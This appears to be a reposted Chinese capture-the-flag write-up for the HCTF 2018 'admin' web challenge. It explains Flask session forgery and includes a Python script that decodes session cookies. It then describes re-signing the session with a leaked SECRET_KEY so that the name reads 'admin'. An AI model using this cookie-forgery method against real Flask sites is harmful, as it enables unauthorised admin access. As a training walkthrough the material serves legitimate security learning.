概述
[HCTF 2018]admin
知识点
- flask session伪造
过程
主页,有注册点和登陆点:
登陆点,测试了一下,没有发现sql注入,然后我们随便注册一个账户123 123,登陆看看
登陆成功之后,有个提示,说明得使用admin账户登陆之后才能得到flag
changepassword,这里发现源码
@app.route('/code')
def get_code():
@app.route('/index')
def index():
@app.route('/register', methods = ['GET', 'POST'])
def register():
@app.route('/login', methods = ['GET', 'POST'])
def login():
@app.route('/logout')
def logout():
@app.route('/change', methods = ['GET', 'POST'])
def change():
@app.route('/edit', methods = ['GET', 'POST'])
def edit():
有这么以上几个功能。
flask session伪造
原理:flask中session是存储在客户端cookie中的,也就是存储在本地。flask仅仅对数据进行了签名。众所周知的是,签名的作用是防篡改,而无法防止被读取。而flask并没有提供加密操作,所以其session的全部内容都是可以在客户端读取的,这就可能造成一些安全问题。
用脚本将session解密
#!/usr/bin/env python3
import sys
import zlib
from base64 import b64decode
from flask.sessions import session_json_serializer
from itsdangerous import base64_decode
def decryption(payload):
payload, sig = payload.rsplit(b'.', 1)
payload, timestamp = payload.rsplit(b'.', 1)
decompress = False
if payload.startswith(b'.'):
payload = payload[1:]
decompress = True
try:
payload = base64_decode(payload)
except Exception as e:
raise Exception('Could not base64 decode the payload because of '
'an exception')
if decompress:
try:
payload = zlib.decompress(payload)
except Exception as e:
raise Exception('Could not zlib decompress the payload before '
'decoding the payload')
return session_json_serializer.loads(payload)
if __name__ == '__main__':
print(decryption(sys.argv[1].encode()))
这里伪造session还需要知道SECRET_KEY,我们在config.py中发现里SECRET_KEY
index.html文件:
发现只要session[‘name’] == ‘admin’,就能得到flag
然后贴出一个flask session加密的脚本 https://github.com/noraj/flask-session-cookie-manager
利用刚刚得到的SECRET_KEY,在将解密出来的name改为admin,最后用脚本生成我们想要的session
{'_fresh': True, '_id': b'33acffdbb8da98c01ab3379ec972f38ced401262f499f628df3eb2a4d06b135ce39867685db5b7525c69ea0e5bc5027c17bf9f7ee1af9721445ac5db6856faf0', 'csrf_token': b'0748bf465b7e203bb622dc868a10a6f8580bf62f', 'image': b'mLzK', 'name': '123', 'user_id': '10'}
用脚本的时候记得到把123 改成 admin
把得到的session在浏览器中替换即可
最后
以上就是刻苦小海豚为你收集整理的buuctf-web-[HCTF 2018]admin-wp的全部内容,希望文章能够帮你解决buuctf-web-[HCTF 2018]admin-wp所遇到的程序开发问题。
如果觉得靠谱客网站的内容还不错,欢迎将靠谱客网站推荐给程序员好友。
本图文内容来源于网友提供,作为学习参考使用,或来自网络收集整理,版权属于原作者所有。
![buuctf-web-[HCTF 2018]admin-wp](/uploads/reation/bcimg9.png)
![[CTFHub]题目Cookie:hello guest. only admin can get flag.(Cookie欺骗、认证、伪造)一、点击进入场景二、按F12打开控制台,查看cookie三、重新设置将admin改为1四、刷新界面](/uploads/reation/bcimg11.png)
![buuctf刷题12(zip://包含& 取反+无参数rce & csrf & FFI扩展安全)<1> [极客大挑战 2020] Roamphp1 welcome<2> [极客大挑战 2020] Roamphp2-Myblog(zip://????)<3> [极客大挑战 2020]Roamphp4-Rceme(取反+无参数rce)<4> [2022鹏程杯] 简单的php(取反+无参数rce)<5> [极客大挑战 2020]Roamphp5-FighterFightsInvincibly<6>](/uploads/reation/bcimg12.png)
发表评论 取消回复